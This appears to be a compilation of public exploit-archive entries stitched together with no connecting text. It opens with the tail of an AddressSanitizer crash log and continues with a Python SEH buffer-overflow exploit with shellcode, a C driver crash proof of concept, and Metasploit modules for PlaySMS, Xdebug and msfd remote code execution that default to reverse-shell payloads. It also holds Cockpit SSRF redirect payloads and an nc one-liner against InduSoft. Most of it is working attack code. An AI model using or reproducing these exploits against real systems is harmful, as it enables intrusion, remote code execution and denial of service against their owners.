SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0a06) in WTF::Ref<WebCore::StyleRareInheritedData, WTF::DumbPtrTraits<WebCore::StyleRareInheritedData> >::ptr() const
Shadow bytes around the buggy address:
0x1c2400013c40: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c2400013c50: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c2400013c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2400013c70: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c2400013c80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x1c2400013c90: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
0x1c2400013ca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2400013cb0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c2400013cc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2400013cd0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x1c2400013ce0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26541==ABORTING
-->
#!/usr/bin/python
# Exploit Title: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow
# Date: 2018-05-02
# Exploit Author: Marwan Shamel
# Software Link: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html
# Version: 1.7.11
# Tested on: Windows 7 Enterprise SP1 32 bit
# Special thanks to my wife
# Steps : Open the APP > click on register > Username field > just paste watever generated from python script in the txt file.
junk = "\x42" * 1008
# below shell code will open calc.exe can be changed according to your needs just make sure to avoid bad chars x0d x00 x0a
evil = ""
evil += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
evil += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
evil += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
evil += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
evil += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
evil += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
evil += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
evil += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
evil += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
evil += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
evil += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
evil += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
evil += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
evil += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
evil += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
evil += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
evil += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nSEH = "\xeb\x0C\x90\x90" #Jmp short 14 (EB0C)
SEH = "\xae\x4a\x01\x10" #pop ebp # pop ebx # ret (DLL have ASLR,safeSEH,rebase off)
nop = "\x90" * 16
data = junk + nSEH + SEH + nop + evil
f = open ("Evil.txt", "w")
f.write(data)
f.close()
/*
# Exploit Title: 2345 Security Guard 3.7 - Denial of Service
# Date: 2018-05-08
# Exploit Author: anhkgg
# Vendor Homepage: http://safe.2345.cc/
# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe
# Version: v3.7
# Tested on: Windows 7 x86
# CVE : CVE-2018-10809
#
# BSOD caused of 2345NetFirewall.sys because of not validating input values,test version 3.7 on windows 7 x86 platform
#
#
*/
#include <windows.h>
#include <stdio.h>
struct NETFW_IOCTL_ADD_PID
{
DWORD pid;
char seed[0x14];//
};//0x18
struct NETFW_IOCTL_SET_PID
{
BYTE set_state;//
BYTE unk;//1
WORD buf_len;//2
DWORD pid;//4
char buf[0x64];//8
};//6c
struct NETFW_IOCTL_222040
{
DWORD* ptr;
DWORD size;
};//
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
int result;
*a1 ^= *a2;
*a2 ^= *a1;
result = (unsigned __int8)*a2;
*a1 ^= result;
return result;
}
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
int result;
unsigned __int8 v4;
__int16 i;
__int16 j;
unsigned __int8 k;
for ( i = 0; i < 256; ++i )
a3[i] = i;
a3[256] = 0;
a3[257] = 0;
k = 0;
v4 = 0;
result = 0;
for ( j = 0; j < 256; ++j )
{
v4 += a3[j] + a1[k];
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
result = (k + 1) / len;
k = (k + 1) % len;
}
return result;
}
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
char *result;
__int16 i;
unsigned __int8 v5;
unsigned __int8 v6;
v5 = a3[256];
v6 = a3[257];
for ( i = 0; i < len; ++i )
{
v6 += a3[++v5];
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
}
a3[256] = v5;
result = a3;
a3[257] = v6;
return result;
}
void calc_seed(char* seed, char* dst)
{
char Source1[26] = {0};
char a3[300] = {0};
Source1[0] = 8;
Source1[1] = 14;
Source1[2] = 8;
Source1[3] = 10;
Source1[4] = 2;
Source1[5] = 3;
Source1[6] = 29;
Source1[7] = 23;
Source1[8] = 13;
Source1[9] = 3;
Source1[10] = 15;
Source1[11] = 22;
Source1[12] = 15;
Source1[13] = 7;
Source1[14] = 91;
Source1[15] = 4;
Source1[16] = 18;
Source1[17] = 26;
Source1[18] = 26;
Source1[19] = 3;
Source1[20] = 4;
Source1[21] = 1;
Source1[22] = 15;
Source1[23] = 25;
Source1[24] = 10;
Source1[25] = 13;
sub_12A80(seed, 0x14, a3);
sub_12B60(Source1, 0x1A, a3);
memcpy(dst, Source1, 26);
}
int poc_2345NetFirewall()
{
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(h == INVALID_HANDLE_VALUE) {
printf("[-] Open device error: %d\n", GetLastError());
return 1;
}
DWORD BytesReturned = 0;
DWORD ctlcode = 0x222298;
NETFW_IOCTL_ADD_PID add_pid = {0};
add_pid.pid = GetCurrentProcessId();
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
ctlcode = 0x2222A4;
NETFW_IOCTL_SET_PID set_pid = {0};
set_pid.pid = GetCurrentProcessId();
set_pid.set_state = 1;
calc_seed(add_pid.seed, set_pid.buf);
set_pid.buf_len = 26;
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
//BSOD
ctlcode = 0x222040;
NETFW_IOCTL_222040 buf_222040 = {0};
buf_222040.size = 1;
buf_222040.ptr = (DWORD*)0x80000000;
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
return 0;
}
int main()
{
poc_2345NetFirewall();
return 0;
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution',
'Description' => %q{
This module exploits a code injection vulnerability within an authenticated file
upload feature in PlaySMS v1.4. This issue is caused by improper file name handling
in sendfromfile.php file.
Authenticated Users can upload a file and rename the file with a malicious payload.
This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Discoverys and Metasploit Module
'DarkS3curity' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB','42003'],
['CVE','2017-9080'],
['URL','https://www.youtube.com/watch?v=MuYoImvfpew'],
['URL','http://touhidshaikh.com/blog/?p=336']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PlaySMS 1.4', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 21 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
CheckCode::Safe
end
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Login ......')
# Send Creds with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Try to access index page with authenticated cookie.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# if we redirect to core_welcome dan we assume we have authenticated cookie.
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
end
end
def exploit
cookies = login
# Agian CSRF token.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_sendfromfile',
'op' => 'list',
}.to_a.shuffle]
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Grabbing CSRF token from body.
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for upload : #{csrf}")
# Payload.
evilname = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
data = post_data.to_s
vprint_status('Trying to upload file with malicious Filename Field....')
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'POST',
'agent' => payload.encode,
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_sendfromfile',
'op' => 'upload_confirm',
}.to_a.shuffle],
'headers' => {
'Upgrade-Insecure-Requests' => '1',
},
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
end
end
# SSRF(Server Side Request Forgery) in Cockpit 0.4.4-0.5.5 (CVE-2018-9302)
Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I've been tested success of "Cockpit CMS" lastest version.
## Product Download: Cockpit (https://getcockpit.com)
## Vulnerability Type:SSRF(Server Side Request Forgery)
## Attack Type : Remote
## Vulnerability Description
You can edit a .php file on own server. The .php file's code example:
<?php Header("Location: dict://127.0.0.1:3306/_0d%");?>
## Exploit
Request:
GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1
Host: myserver
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
referer:http://myserver/index.php
Modify the redirect.php file on the attacker's server.example:
<?php Header("Location: gopher://127.0.0.1:3306/_0d%");?>
If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol
scan prot,example: <?php Header("Location: dict://127.0.0.1:3306/");?>
If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini,allow_url_fopen option defualt is enable.
## Versions
Product: Cockpit CMS 0.4.4-0.5.5
## Impact
SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter.
## Fix Code
The fix code example:
$url = $_REQUEST['url'];
$content = null;
if (!filter_var($url, FILTER_VALIDATE_URL)) {
header('HTTP/1.0 400 Bad Request');
return;
}
// allow only http requests
if (!preg_match('#^http(|s)\://#', $url)) {
header('HTTP/1.0 403 Forbidden');
return;
}
preg_match('/https*:\/\/(.+)/', $url, $matches);
$host= count($matches) > 1 ? $matches[1] : '';
$ip = gethostbyname($host);
//check private ip
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE)) {
return
}
and modify the line 48 :
curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 0);
## Credit
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9302
### Timeline:
2018-04-03 Found Cockpit CMS vulnerability.
2018-04-04 Submit vulnerability information to developers.
2018-04-05 Submit CVE-ID request
2018-04-28 Vendor no response, Public vulnerability information,Please Fix it.
What do you need to know? Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition.
What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.
What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.
What's the solution? Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Affected users should apply the patches ASAP.
The following is a proof of concept:
cat <(echo -ne '\x02\x57\x03\x02\x32'`python -c 'print "A"*0x500'`'\x09\x0a\x03') - | nc <target_host> 1234
More information: https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. If this socket is accessible on a remote
interface, an attacker can execute commands on the victim's machine.
If msfd is running with higher privileges than the current local user,
this module can also be used for privilege escalation. In that case,
port forwarding on the compromised host can be used.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
},
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'License' => BSD_LICENSE,
'Platform' => "ruby",
'Arch' => ARCH_RUBY,
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'BadChars' => "\x27\x0a",
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(55554)
])
end
def check
connect
data = sock.get_once
if data.include?("msf")
disconnect
return Exploit::CheckCode::Appears
end
disconnect
return Exploit::CheckCode::Unknown
end
def exploit
connect
sock.get_once
sock.put "irb -e '" + payload.encoded + "'\n"
disconnect
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end
def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})
client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. This module connects to the msfd-socket
through the victim's browser.
To execute msfconsole-commands in JavaScript from a web application,
this module places the payload in the POST-data. These POST-requests
can be sent cross-domain and can therefore be sent to localhost on the
victim's machine. The msfconsole-command to execute code is 'rbi -e
"CODE"'.
Exploitation when the browser is running on Windows is unreliable and
the exploit is only usable when IE is used and the quiet-flag has been
passed to msf-daemon.
},
'License' => BSD_LICENSE,
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Targets' =>
[
[ 'Automatic', {}],
],
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'DisableNops' => 'True',
'BadChars' => "\x22\x0a"
},
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options([
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
])
end
def exploit
super
end
def on_request_uri(cli, request)
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
sc = payload.encoded
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
var1 = rand_text_alpha(rand(6..11))
var2 = rand_text_alpha(rand(6..11))
html = <<-EOS
<html>
<head></head>
<body>
<script>
var #{var1} = new XMLHttpRequest();
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
var #{var2} = String("#{shellcode}");
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
</script>
</body>
</html>
EOS
print_status("#{msg} Sending HTML...")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end